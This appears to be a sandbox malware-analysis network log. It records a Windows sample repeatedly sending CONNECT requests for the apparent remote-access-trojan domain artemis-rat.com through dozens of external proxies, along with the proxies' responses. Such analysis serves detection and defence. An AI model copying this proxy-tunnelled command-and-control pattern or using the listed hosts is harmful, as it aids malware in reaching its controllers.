                                              Mar 11, 2024 08:37:29.616960049 CET421INData Raw: 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d
                                              Data Ascii: tion and was unable to completeyour request.</p><p>Please contact the server administrator at administrator@wildstyle-network.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1190192.168.2.45379738.162.1.19031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.531747103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.942384005 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1191192.168.2.45300591.134.140.160328967284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.595827103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163080931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.741417885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846391916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.843723059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.795581102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.762532949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192192.168.2.451644103.156.17.3981817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.596313000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.769992113 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1193192.168.2.453755114.132.202.7880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.596712112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.136159897 CET84INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1194192.168.2.4535778.213.128.90817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.596762896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1195192.168.2.453758185.158.114.14259837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.597019911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1196192.168.2.451655190.109.5.1389997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.597923040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.756975889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.594109058 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1197192.168.2.451619190.103.61.25480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.598113060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.893255949 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1198192.168.2.453728191.102.254.5480857284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.601847887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.411300898 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1199192.168.2.453836104.16.72.45807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.609244108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.763353109 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1200192.168.2.45377952.80.55.7880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.621517897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.972109079 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1201192.168.2.45323751.81.186.179586307284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.626642942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1202192.168.2.45375042.49.148.16790017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.632855892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.027337074 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1203192.168.2.45379251.15.242.20288887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.636749029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366543055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.367113113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257339001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.069708109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.757124901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1204192.168.2.453777103.49.114.19580807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.637330055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1205192.168.2.453783178.62.229.2831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.638690948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.365873098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.292323112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.163568020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.160398960 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1206192.168.2.451716171.22.108.18831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.638885975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.144766092 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1207192.168.2.452565185.208.183.12231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.668678999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1208192.168.2.45384138.162.27.7931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.668920994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.097795010 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1209192.168.2.453808211.43.214.205807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.669749022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366564989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.367168903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.209011078 CET536INHTTP/1.1 400 Bad Request
                                              Date: Mon, 11 Mar 2024 07:37:35 GMT
                                              Server: cloudflare
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 655
                                              CF-RAY: -
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d
                                              Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrom
                                              Mar 11, 2024 08:37:35.209036112 CET295INData Raw: 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f
                                              Data Ascii: e friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1210192.168.2.453787194.146.110.22810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.669939041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366586924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.367327929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.366507053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.257209063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.163392067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.054172039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.866204023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:01.569330931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1211192.168.2.45381627.96.235.171807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.672050953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1212192.168.2.45381358.234.116.19781977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.672195911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1213192.168.2.45383454.178.159.199180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.674695015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.936165094 CET503INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Connection: close
                                              Content-Length: 324
